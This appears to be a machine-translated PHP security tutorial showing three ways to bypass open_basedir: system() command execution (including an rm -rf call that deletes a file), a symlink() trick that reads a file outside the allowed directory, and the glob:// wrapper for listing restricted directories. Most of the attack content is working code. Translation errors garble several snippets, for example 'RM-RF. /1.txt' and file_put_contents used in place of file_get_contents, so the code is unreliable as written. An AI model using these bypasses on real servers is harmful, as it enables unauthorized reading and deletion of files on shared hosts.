How to bypass Open_basedir to restrict operation files via PHP

This article to share the PHP bypass Open_basedir restrictions on the operation of the file three methods and related skills, interested friends refer to the study.

0x00 Preparation Knowledge

About Open_basedir

Open_basedir is a configuration option in the PHP.ini

It restricts the active scope of the user's access to the file to the specified region,

Assuming open_basedir=/home/wwwroot/home/web1/:/tmp/, then users accessing the server through Web1 will not be able to get on the server except/home/wwwroot/home/web1/and/tmp/ Files outside of these two directories.

Note that the limit specified with Open_basedir is actually a prefix, not a directory name.

For example: if "Open_basedir =/dir/user", then the directory "/dir/user" and "/dir/user1" are accessible. So if you want to restrict access to only the specified directory, end the path name with a slash.

About Symbolic Links

Symbolic links are also called Soft links, a special kind of file that contains the path name (absolute path or relative path) of another file.

The path can be any file or directory and can link files from different file systems. When you read or write to the symbol file, the system automatically converts the operation to the source file, but when you delete the linked file, the system simply deletes the linked file without deleting the source file itself.

0x01 Command Execution function

Because the Open_basedir setting is not valid for command execution functions such as system, we can use the command execution function to access the restricted directory.

We first create a directory

/home/puret/test/

and create a new 1.txt content in this directory for ABC

Nano 1.txt

Then create a directory under this directory named B

mkdir b

and create a 1.php file content in this directory as

<?php  Echo file_get_contents (".. /1.txt ");? >

and set our Open_basedir in the php.ini.

Open_basedir =/home/puret/test/b/

We tried to execute 1.php to see if Open_basedir would limit our access

Execution effect

It is clear that we cannot directly read the directory files other than those specified by Open_basedir.

Next we use the system function to try to remove the 1.txt around the open_basedir limit

Edit 1.php to

<?php System ("RM-RF. /1.txt ");? >

Let's take a look at the file before executing 1.php

After executing 1.php

The file was successfully removed by a command execution function that bypasses Open_basedir.
Because command execution functions are generally limited to disable_function, we need to look for other ways to bypass the restrictions.

0x02 symlink () function

Let's take a look at the symlink function.

BOOL Symlink (String $target, String $link)

The Symlink function will create a symbolic link to the target named Link, which, of course, is typically limited to open_basedir.
Because the early symlink did not support windows, my test environment was placed under Linux.

The PHP version of the test is 5.3.0, and the other versions are self-rated.

In a Linux environment, we can do some logical bypass through symlink, resulting in the ability to manipulate files across directories.

We first edit the contents of 1.php in/var/www/html/1.php as

<?php  mkdir ("C");  ChDir ("C");  mkdir ("D");  ChDir ("D");  ChDir ("..");  ChDir ("..");  Symlink ("C/D", "Tmplink");  Symlink ("tmplink/. /.. /1.txt "," exploit ");  Unlink ("Tmplink");  mkdir ("Tmplink");  Echo file_put_contents ("Http://127.0.0.1/exploit");? >

Then create a new 1.txt file in the/var/www/with the contents of

"ABC"

Let's set up our open_basedir.

Open_basedir =/var/www/html/

Edit a PHP script in the HTML directory to check the Open_basedir

<?php   file_get_contents (".. /1.txt ");? >

Execution look down.

As expected, the file cannot be accessed.

We execute the script we just wrote, 1.php.

Can see successfully read to the 1.txt file content, escaped the open_basedir limit

The key to the problem is

Symlink ("tmplink/. /.. /1.txt "," exploit ");

At this point Tmplink is also a symbolic link file, which points to a path of C/D, so the path exploit points to becomes

c/d/. /.. /1.txt

Because this path is within the range of the Open_basedir, exploit was successfully established.

After we delete the Tmplink symbolic link file and create a new folder with the same name as Tmplink, the path that exploit points to is

tmplink/. /.. /

Because of this time Tmplink becomes a real folder so tmplink/. /.. /Become a directory where 1.txt is/var/www/

You can then read the file contents of 1.txt directly by accessing the symbolic link file exploit

Of course, for Symlink () just put it into the disable_function to solve the problem, so we need to find more ways.

0X03 Glob Pseudo-protocol

Glob is a pseudo-protocol used to filter the directory from PHP since the 5.3.0 version, because it is not subject to Open_basedir when filtering the directory, so we can use it to bypass the restrictions, we create a new directory under/var/www/named Test

And the new t.php content under/var/www/html/is

<?php  $a = "glob:///var/www/test/*.txt";  if ($b = Opendir ($a)) {while    (($file = Readdir ($b))!== false) {      echo "filename:". $file. " \ n ";    }    Closedir ($b);  }? >

Execution results

Successfully escaped the Open_basedir limit to read the file.

The above is the whole content of this article, I hope that everyone's learning has helped, more relevant content please pay attention to topic.alibabacloud.com!